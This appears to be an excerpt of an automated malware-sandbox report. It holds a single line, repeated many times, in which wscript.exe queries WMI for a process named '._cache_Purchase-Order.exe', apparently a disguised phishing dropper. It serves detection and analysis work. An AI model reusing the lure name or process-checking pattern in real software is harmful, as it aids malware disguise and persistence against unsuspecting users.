                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
